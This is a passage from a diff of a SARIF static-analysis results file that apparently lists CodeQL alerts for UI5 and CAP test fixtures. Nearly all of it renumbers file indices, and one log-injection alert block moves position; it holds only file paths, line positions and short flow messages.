"%SRCROOT%", - "index" : 411 + "index" : 410 }, "region" : { "startLine" : 15, 
@@ -46957,7 +20771,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/controller/app.controller.js", "uriBaseId" : "%SRCROOT%", - "index" : 407 + "index" : 406 }, "region" : { "startLine" : 9, @@ -46975,7 +20789,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 411 + "index" : 410 }, "region" : { "startLine" : 22, @@ -46996,7 +20810,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 411 + "index" : 410 }, "region" : { "startLine" : 8, @@ -47014,7 +20828,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 411 + "index" : 410 }, "region" : { "startLine" : 15, @@ -47162,7 +20976,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js", "uriBaseId" : "%SRCROOT%", - "index" : 216 + "index" : 214 }, "region" : { "startLine" : 17, @@ -47183,7 +20997,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 220 + "index" : 219 }, "region" : { "startLine" : 5, @@ -47202,7 +21016,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/controller/app.controller.js", "uriBaseId" : "%SRCROOT%", - "index" : 214 + "index" : 215 }, "region" : { "startLine" : 9, 
@@ -47220,7 +21034,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js", "uriBaseId" : "%SRCROOT%", - "index" : 216 + "index" : 214 }, "region" : { "startLine" : 8, @@ -47238,7 +21052,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js", "uriBaseId" : "%SRCROOT%", - "index" : 216 + "index" : 214 }, "region" : { "startLine" : 17, @@ -47259,7 +21073,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 220 + "index" : 219 }, "region" : { "startLine" : 5, @@ -47289,7 +21103,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", "uriBaseId" : "%SRCROOT%", - "index" : 222 + "index" : 223 }, "region" : { "startLine" : 23, @@ -47310,7 +21124,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 227 + "index" : 228 }, "region" : { "startLine" : 5, @@ -47329,7 +21143,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/controller/app.controller.js", "uriBaseId" : "%SRCROOT%", - "index" : 228 + "index" : 224 }, "region" : { "startLine" : 9, @@ -47347,7 +21161,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", "uriBaseId" : "%SRCROOT%", - "index" : 222 + "index" : 223 }, "region" : { "startLine" : 9, 
@@ -47365,7 +21179,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", "uriBaseId" : "%SRCROOT%", - "index" : 222 + "index" : 223 }, "region" : { "startLine" : 15, @@ -47383,7 +21197,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", "uriBaseId" : "%SRCROOT%", - "index" : 222 + "index" : 223 }, "region" : { "startLine" : 15, @@ -47401,7 +21215,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", "uriBaseId" : "%SRCROOT%", - "index" : 222 + "index" : 223 }, "region" : { "startLine" : 17, @@ -47419,7 +21233,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", "uriBaseId" : "%SRCROOT%", - "index" : 222 + "index" : 223 }, "region" : { "startLine" : 17, @@ -47437,7 +21251,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", "uriBaseId" : "%SRCROOT%", - "index" : 222 + "index" : 223 }, "region" : { "startLine" : 17, @@ -47455,7 +21269,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", "uriBaseId" : "%SRCROOT%", - "index" : 222 + "index" : 223 }, "region" : { "startLine" : 17, @@ -47473,7 +21287,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", "uriBaseId" : "%SRCROOT%", - "index" : 222 + "index" : 223 }, "region" : { "startLine" : 23, 
@@ -47494,7 +21308,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 227 + "index" : 228 }, "region" : { "startLine" : 5, @@ -47545,7 +21359,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 235 + "index" : 236 }, "region" : { "startLine" : 5, @@ -47603,7 +21417,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 235 + "index" : 236 }, "region" : { "startLine" : 5, 
@@ -47723,6 +21537,133 @@ "text" : "user-provided value" } } ] + }, { + "ruleId" : "js/ui5-log-injection", + "rule" : { + "id" : "js/ui5-log-injection", + "index" : 3, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 171 + }, + "region" : { + "startLine" : 13, + "startColumn" : 38, + "endColumn" : 56 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "fb0b88ea7a3fc8f1:1", + "primaryLocationStartColumnFingerprint" : "21" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 176 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 172 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 171 + }, + "region" : { + "startLine" : 7, + "startColumn" : 23, + "endColumn" : 38 + } + }, + "message" : { + "text" : "{ 
type: \"int\" }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 171 + }, + "region" : { + "startLine" : 13, + "startColumn" : 38, + "endColumn" : 56 + } + }, + "message" : { + "text" : "oControl.getText()" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 176 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] }, { "ruleId" : "js/ui5-log-injection", "rule" : { 
@@ -47920,133 +21861,6 @@ "text" : "user-provided value" } } ] - }, { - "ruleId" : "js/ui5-log-injection", - "rule" : { - "id" : "js/ui5-log-injection", - "index" : 3, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 171 - }, - "region" : { - "startLine" : 13, - "startColumn" : 38, - "endColumn" : 56 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "fb0b88ea7a3fc8f1:1", - "primaryLocationStartColumnFingerprint" : "21" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 175 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 172 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 171 - }, - "region" : { - "startLine" : 7, - "startColumn" : 23, - "endColumn" : 38 - } - }, - "message" : { - "text" : "{ 
type: \"int\" }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 171 - }, - "region" : { - "startLine" : 13, - "startColumn" : 38, - "endColumn" : 56 - } - }, - "message" : { - "text" : "oControl.getText()" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 175 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] }, { "ruleId" : "js/ui5-log-injection", "rule" : { @@ -48315,7 +22129,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", "uriBaseId" : "%SRCROOT%", - "index" : 179 + "index" : 180 }, "region" : { "startLine" : 17, @@ -48336,7 +22150,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 184 + "index" : 185 }, "region" : { "startLine" : 5, @@ -48355,7 +22169,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/controller/app.controller.js", "uriBaseId" : "%SRCROOT%", - "index" : 185 + "index" : 181 }, "region" : { "startLine" : 9, @@ -48373,7 +22187,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", "uriBaseId" : "%SRCROOT%", - "index" : 179 + "index" : 180 }, "region" : { "startLine" : 8, 
@@ -48391,7 +22205,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", "uriBaseId" : "%SRCROOT%", - "index" : 179 + "index" : 180 }, "region" : { "startLine" : 15, @@ -48409,7 +22223,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", "uriBaseId" : "%SRCROOT%", - "index" : 179 + "index" : 180 }, "region" : { "startLine" : 15, @@ -48427,7 +22241,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", "uriBaseId" : "%SRCROOT%", - "index" : 179 + "index" : 180 }, "region" : { "startLine" : 16, @@ -48445,7 +22259,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", "uriBaseId" : "%SRCROOT%", - "index" : 179 + "index" : 180 }, "region" : { "startLine" : 16, @@ -48463,7 +22277,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", "uriBaseId" : "%SRCROOT%", - "index" : 179 + "index" : 180 }, "region" : { "startLine" : 16, @@ -48481,7 +22295,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", "uriBaseId" : "%SRCROOT%", - "index" : 179 + "index" : 180 }, "region" : { "startLine" : 16, @@ -48499,7 +22313,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", "uriBaseId" : "%SRCROOT%", - "index" : 179 + "index" : 180 }, "region" : { "startLine" : 17, 
@@ -48520,7 +22334,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 184 + "index" : 185 }, "region" : { "startLine" : 5, @@ -48550,7 +22364,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", "uriBaseId" : "%SRCROOT%", - "index" : 188 + "index" : 189 }, "region" : { "startLine" : 17, @@ -48571,7 +22385,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 192 + "index" : 193 }, "region" : { "startLine" : 6, @@ -48590,7 +22404,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", "uriBaseId" : "%SRCROOT%", - "index" : 188 + "index" : 189 }, "region" : { "startLine" : 9, @@ -48608,7 +22422,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", "uriBaseId" : "%SRCROOT%", - "index" : 188 + "index" : 189 }, "region" : { "startLine" : 15, @@ -48626,7 +22440,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", "uriBaseId" : "%SRCROOT%", - "index" : 188 + "index" : 189 }, "region" : { "startLine" : 15, @@ -48644,7 +22458,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", "uriBaseId" : "%SRCROOT%", - "index" : 188 + "index" : 189 }, "region" : { "startLine" : 17, 
@@ -48665,7 +22479,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 192 + "index" : 193 }, "region" : { "startLine" : 6, @@ -48716,7 +22530,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 204 + "index" : 202 }, "region" : { "startLine" : 5, @@ -48810,7 +22624,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 204 + "index" : 202 }, "region" : { "startLine" : 5, @@ -48861,7 +22675,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 209 + "index" : 210 }, "region" : { "startLine" : 5, @@ -48955,7 +22769,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 209 + "index" : 210 }, "region" : { "startLine" : 5, @@ -49347,7 +23161,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js", "uriBaseId" : "%SRCROOT%", - "index" : 163 + "index" : 166 }, "region" : { "startLine" : 16, @@ -49368,7 +23182,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 166 + "index" : 167 }, "region" : { "startLine" : 5, 
@@ -49387,7 +23201,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js", "uriBaseId" : "%SRCROOT%", - "index" : 163 + "index" : 166 }, "region" : { "startLine" : 10, @@ -49405,7 +23219,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js", "uriBaseId" : "%SRCROOT%", - "index" : 163 + "index" : 166 }, "region" : { "startLine" : 16, @@ -49426,7 +23240,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 166 + "index" : 167 }, "region" : { "startLine" : 5, @@ -51373,7 +25187,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 103 + "index" : 101 }, "region" : { "startLine" : 9, @@ -51394,7 +25208,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 103 + "index" : 101 }, "region" : { "startLine" : 6, @@ -51412,7 +25226,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 103 + "index" : 101 }, "region" : { "startLine" : 7, @@ -51430,7 +25244,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 103 + "index" : 101 }, "region" : { "startLine" : 7, 
@@ -51448,7 +25262,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 103 + "index" : 101 }, "region" : { "startLine" : 7, @@ -51466,7 +25280,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 103 + "index" : 101 }, "region" : { "startLine" : 7, @@ -51484,7 +25298,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 103 + "index" : 101 }, "region" : { "startLine" : 7, @@ -51502,7 +25316,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 103 + "index" : 101 }, "region" : { "startLine" : 9, @@ -51523,7 +25337,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 103 + "index" : 101 }, "region" : { "startLine" : 6, @@ -51552,7 +25366,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 108 + "index" : 109 }, "region" : { "startLine" : 9, @@ -51573,7 +25387,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", "uriBaseId" : "%SRCROOT%", - "index" : 106 + "index" : 107 }, "region" : { "startLine" : 6, 
@@ -51591,7 +25405,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", "uriBaseId" : "%SRCROOT%", - "index" : 106 + "index" : 107 }, "region" : { "startLine" : 7, @@ -51609,7 +25423,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", "uriBaseId" : "%SRCROOT%", - "index" : 106 + "index" : 107 }, "region" : { "startLine" : 7, @@ -51627,7 +25441,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", "uriBaseId" : "%SRCROOT%", - "index" : 106 + "index" : 107 }, "region" : { "startLine" : 7, @@ -51645,7 +25459,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", "uriBaseId" : "%SRCROOT%", - "index" : 106 + "index" : 107 }, "region" : { "startLine" : 7, @@ -51663,7 +25477,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", "uriBaseId" : "%SRCROOT%", - "index" : 106 + "index" : 107 }, "region" : { "startLine" : 7, @@ -51681,7 +25495,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", "uriBaseId" : "%SRCROOT%", - "index" : 106 + "index" : 107 }, "region" : { "startLine" : 9, @@ -51699,7 +25513,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", "uriBaseId" : "%SRCROOT%", - "index" : 106 + "index" : 107 }, "region" : { "startLine" : 9, 
@@ -51717,7 +25531,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 108 + "index" : 109 }, "region" : { "startLine" : 6, @@ -51735,7 +25549,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 108 + "index" : 109 }, "region" : { "startLine" : 7, @@ -51753,7 +25567,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 108 + "index" : 109 }, "region" : { "startLine" : 7, @@ -51771,7 +25585,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 108 + "index" : 109 }, "region" : { "startLine" : 7, @@ -51789,7 +25603,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 108 + "index" : 109 }, "region" : { "startLine" : 7, @@ -51807,7 +25621,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 108 + "index" : 109 }, "region" : { "startLine" : 7, @@ -51825,7 +25639,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 108 + "index" : 109 }, "region" : { "startLine" : 9, 
@@ -51846,7 +25660,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", "uriBaseId" : "%SRCROOT%", - "index" : 106 + "index" : 107 }, "region" : { "startLine" : 6, @@ -51875,7 +25689,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 122 + "index" : 115 }, "region" : { "startLine" : 9, @@ -51896,7 +25710,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", "uriBaseId" : "%SRCROOT%", - "index" : 114 + "index" : 113 }, "region" : { "startLine" : 6, @@ -51914,7 +25728,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", "uriBaseId" : "%SRCROOT%", - "index" : 114 + "index" : 113 }, "region" : { "startLine" : 7, @@ -51932,7 +25746,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", "uriBaseId" : "%SRCROOT%", - "index" : 114 + "index" : 113 }, "region" : { "startLine" : 7, @@ -51950,7 +25764,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", "uriBaseId" : "%SRCROOT%", - "index" : 114 + "index" : 113 }, "region" : { "startLine" : 7, @@ -51968,7 +25782,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", "uriBaseId" : "%SRCROOT%", - "index" : 114 + "index" : 113 }, "region" : { "startLine" : 7, 
@@ -51986,7 +25800,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", "uriBaseId" : "%SRCROOT%", - "index" : 114 + "index" : 113 }, "region" : { "startLine" : 7, @@ -52004,7 +25818,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", "uriBaseId" : "%SRCROOT%", - "index" : 114 + "index" : 113 }, "region" : { "startLine" : 9, @@ -52022,7 +25836,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", "uriBaseId" : "%SRCROOT%", - "index" : 114 + "index" : 113 }, "region" : { "startLine" : 9, @@ -52040,7 +25854,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 122 + "index" : 115 }, "region" : { "startLine" : 6, @@ -52058,7 +25872,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 122 + "index" : 115 }, "region" : { "startLine" : 7, @@ -52076,7 +25890,7 @@ "artifactLocation" : { "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", "uriBaseId" : "%SRCROOT%", - "index" : 122 + "index" : 115 }, "region" : { "startLine" : 7, @@ -52094,7 +25908,7 @@ "artifactLocation" : { "uri" : 